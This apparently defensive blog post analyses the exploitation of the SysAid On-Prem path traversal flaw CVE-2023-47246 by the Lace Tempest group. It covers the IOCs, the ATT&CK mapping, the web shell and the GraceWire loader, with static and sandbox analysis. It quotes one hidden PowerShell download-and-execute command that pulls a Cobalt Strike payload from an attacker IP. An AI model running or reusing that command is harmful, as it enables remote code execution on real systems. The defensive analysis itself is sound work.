Introduction
In this blog post, we’ll investigate the fascinating details regarding CVE-2023–47246 SysAid On-Prem Software Vulnerability and uncover how attackers are compromising endpoints. This blog will also discuss how Lace Tempest weaponizes GraceWire Loader or Turtle Loader according to Microsoft Security Intelligence malware, and how to recognize the indicators of compromise (IOCs) from active exploitation.
SysAid[1] has advised its clients to update their systems to the newest version, 23.3.36, as a precautionary step.
Indicators of Compromise
Hashes/Names
UserEntry.class:
98d4184379fb6cf08a57f2bc937887965ae3e9c977a87a5c6443bf5c055bfd18
user.bin:
f0fb710ee7b2a7f07acdf87cba7b79331ead0eda74276150fde8413b7793fcd7
user.exe:
b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f2165f2522bf4dusersfiles.war:
be4334ce0be2683878c5b9fb911a4fb9beaaa09845028215134081268621df38
IP Addresses
81.19.138[.]52 — GraceWire Loader C2
45.182.189[.]100 — GraceWire Loader C2
179.60.150[.]34 — Cobalt Strike C2
45.155.37[.]105 — Meshagent remote admin tool C2
Adversary TTPs Mapping
Server Software Component: Web Shell — T1505.003
Command and Scripting Interpreter: PowerShell — T1059.001
Process Injection — T1055
Indicator Removal: File Deletion — T1070.004
Exfiltration Over C2 Channel — T1041
Develop Capabilities: Malware — T1587.001
Exploitation for Privilege Escalation — T1068
Threat Actor Information
The threat actors, known by multiple names such as DEV-0950, Storm-0950, or Lace Tempest, most recently known for actively exploiting an SQL injection vulnerability in MOVEit transfer (CVE-2023–34362).[3] As per the Microsoft Threat Intelligence team, their typical modus operandi involves exploitation followed by deploying a web shell with data exfiltration capabilities.[2]
Identified as a ransomware group, Lace Tempest, not only known for their involvement in the Cl0p extortion site. The group gained notoriety for its attack on the UK payroll software provider Zellis. This incident resulted in the exposure of personal data from thousands of employees at prominent entities like the BBC, British Airways, Boots UK, and the Nova Scotia government.[4]
What exactly is CVE-2023–47246 and how are threat actors get into the victim’s system?
As per SysAid’s findings, they identified a vulnerability on November 2nd. Subsequent analysis by their security team disclosed that this vulnerability is currently being actively exploited in real-world scenarios. The specific vulnerability, CVE-2023–47246, affects SysAid On-Premise versions prior to 23.3.36. It involves a path traversal vulnerability that can result in code execution when an attacker writes a file to the Tomcat webroot. Instances of exploitation in the wild have been observed in November 2023.
What happened to SysAid customers? According to SysAid investigation
Lace Tempest strategically focused on the “C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\” of the SysAid Tomcat web service. The group’s tactic involves uploading a WAR archive to gain unauthorized access, utilizing a web shell for execution. This web shell serves as a gateway to run a Powershell script and deploy a malicious binary named “user.exe.”
What exactly is a WAR archive? A WAR (Web Application Archive) is a file format in Java used to package and distribute web applications. It includes JavaServer Pages, servlets, classes, XML files, and other resources in a standardized structure. WAR files simplify deployment by encapsulating all components into a single compressed file, making them portable and compatible with various web servers and application servers.
The purpose of “user.exe” is to function as a loader for the GraceWire trojan. The trojan is then injected into one of the key system processes; “spoolsv.exe,” “msiexec.exe,” or “svchost.exe.” This approach allows Lace Tempest to establish a foothold and execute its malicious activities within the compromised environment.
Lace Tempest placed their files within the SysAidServer directory under the name “usersfiles” Fortunately, we managed to secure a copy of the files.
The obtained data reveals the presence of two directories, one data file, and a Windows executable designed for x64 bit systems, named ‘user.exe’
How is Lace Tempest launching the malware loader?
The execution phase initiates after Lace Tempest successfully exploits the vulnerability. At this point, a PowerShell script comes into play, serving as the mechanism to launch the malicious “user.exe.” This marks a critical juncture where the attackers leverage PowerShell for the deployment and execution of their malicious payload, extending their control within the compromised system.
Here’s a sample of the Powershell Script to load “user.exe” GraceWire loader.
To provide a comprehensive understanding of the PowerShell script, a comment has been added for the reader’s clarity and insight. This commentary aims to enhance the reader’s comprehension of the script’s functionality and its significance within the context of the attack orchestrated by Lace Tempest.
Indicator Removal: File Deletion T1070.004
In this particular task, Lace Tempest employs an additional PowerShell script designed for the deletion of Indicators of Compromise (IOCs). This script likely serves as a means to cover their tracks and erase any traces that could potentially be used for detection or analysis by security professionals.
Here’s a Powershell Script used by Lace Tempest for Indicator Removal:
The observed script seems to have a multifaceted purpose. It appears to perform log file cleanup by targeting specific patterns, keep tabs on the existence of particular files, and execute code stored in the SehCore environment variable. This suggests a systematic effort by Lace Tempest to maintain a stealthy presence, eliminate traces, and potentially execute further malicious operations within the compromised environment.
Lace Tempest utilizing Cobalt Strike as C2C tool
In the ongoing SysAid investigation, Lace Tempest utilizes a PowerShell command to download and execute a CobaltStrike listener on the targeted hosts. This strategic move implies an intention to leverage Cobalt Strike, a renowned penetration testing tool linked with red teaming and adversary simulation. The use of such sophisticated tools points towards Lace Tempest being an advanced and targeted threat actor, actively probing and potentially exploiting vulnerabilities within the SysAid environment.
Here’s the sample Powershell command used:
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('<http://179.60.150>[.]34:80/a')
Our Findings
Upon our investigation into the “WEB-NF” directory within “classes/com/ilient/server” and extracting strings from “UserClassEntry.class,” part of WAR archive that was uploaded to the server, certain revealing strings come to light. Notably, the presence of strings like “powershell.exe” indicates the utilization of PowerShell within the uploaded WebShell, suggesting a potential avenue for executing commands and facilitating further malicious activities.’
If we run ‘file’ command to “UserClassEntry.class” file identified it as “Compiled Java Class Data”
Powershell.exe in a Java class? seems a bit odd right?
According to MTI: Microsoft Threat Intelligence on Twitter / X
GraceWire Loader: Static Analysis
In this phase, we conduct fundamental static analysis of “user.exe,” a file recognized by SysAid as a loader for the GraceWire Malware. This analysis aims to glean insights into the file’s structure, functions, and potential behaviors, providing a foundational understanding of its role in the broader malicious campaign orchestrated by Lace Tempest.
Strings Extraction
Running strings with “-e l” option to extract all the readable strings from “user.exe”.
Utilizing CFFExplorer for Static Analysis
CFFExplorer > File Header > Machine > AMD64 indicates processor type meant to run this file on.
GraceWire Loader leveraging KERNEL32.DLL
During the analysis, notable modules employed by this malware come to light, including those associated with File, Directory, and Process-related APIs. These insights provide a glimpse into the functionalities and capabilities of the malware, shedding light on its potential actions and the extent of control it may exert within the compromised system.
The inclusion of “IsDebuggerPresent” signals the implementation of an anti-analysis technique by the malware. This particular function is commonly used to detect the presence of a debugger or analysis environment. Its inclusion suggests that the malware is equipped with measures to evade detection and analysis, adding an additional layer of sophistication to its design.
The identification of APIs like “GetTickCount” indicates the incorporation of anti-analysis techniques within the malware. “GetTickCount” is often employed to measure the system uptime, and its presence suggests an effort to hinder analysis by introducing elements that can mislead or complicate the examination process. This underscores the malware’s intent to operate covertly and avoid detection by security analysts.
GraceWire Loader Dependency Chain
The KERNEL32.dll file is essentially another Portable Executable (PE) file, relying on additional Dynamic Link Libraries (DLLs). These DLLs, in turn, may have dependencies on further DLLs, creating a chain of interdependencies. During execution, the Windows loader is responsible for loading all the DLLs in this chain, highlighting the intricate and interconnected nature of the components involved in the operation of the malware.
We can view the dependency chain by opening “Dependency Walker”
Utilizing PEStudio
This particular sample has garnered attention from multiple Antivirus (AV) vendors, being flagged as “TurtleLoader.” Considering the timestamp, it indicates that this malware is a recently identified sample, drawing the focus of security solutions as a newly detected threat.
The compiler stamp reveals that this specific sample was compiled on “Wed Aug 30 07:41:06 2023 | UTC.”
The observation of section entropy, with many sections exceeding a value of 5, suggests the possibility that certain sections within the file may be packed. Elevated section entropy values often indicate compressed or encrypted content, implying an effort to obfuscate the file’s true nature or hinder straightforward analysis. This underscores the need for additional unpacking and in-depth investigation to unveil the concealed components and functionalities of the malware.
GraceWire Loader: Dynamic SandBox Analysis
Upon submitting the sample to an online sandbox like Hybrid Analysis, the results indicate that the sample is flagged as “malicious” with a high threat score of “100/100.”
The analysis identifies the sample as both “ransomware” and a “webshell.” These classifications align with the earlier findings, affirming the malicious nature of the sample and providing additional context regarding its potential functionalities, including characteristics associated with ransomware and webshells.
Hybrid Analysis has identified suspicious indicators within the sample, highlighting its malware process and registry reconnaissance capabilities. This points to the sample’s ability to engage in activities related to process manipulation and registry exploration, showcasing its multifaceted and potentially harmful functionalities within the compromised system.
It has identified specific APIs within the sample that indicate suspicious activity. The presence of APIs like LoadLibrary() and IsDebuggerPresent() raises concerns about potentially malicious behaviors. LoadLibrary() is often associated with dynamic loading of libraries, a technique employed in various attacks, while IsDebuggerPresent() is indicative of anti-analysis measures. These findings underscore the sample’s intention to engage in suspicious or malicious activities and its efforts to evade detection and analysis.
If you’re interested about the full report, you can view it here: Free Automated Malware Analysis Service — powered by Falcon Sandbox — Viewing online file analysis results for ‘user.exe’ (hybrid-analysis.com)
Conclusion
As technology advances, threat actors are becoming more sophisticated. The prevalence of web shell attacks and zero-day vulnerabilities is increasing. By reading blogs and insights from fellow security researchers, we gain valuable knowledge to better defend against these evolving attacks and improve our detection capabilities. As attackers grow more creative, it is imperative for blue teamers to adapt. This blog aims to provide fresh insights for readers, and we at SBT hope you find this post valuable.
If you found this topic interesting and you don’t have any exposure to Malware Analysis, Reverse Engineering and Incident Response, why not take a look at our Blue Team Labs Online platform?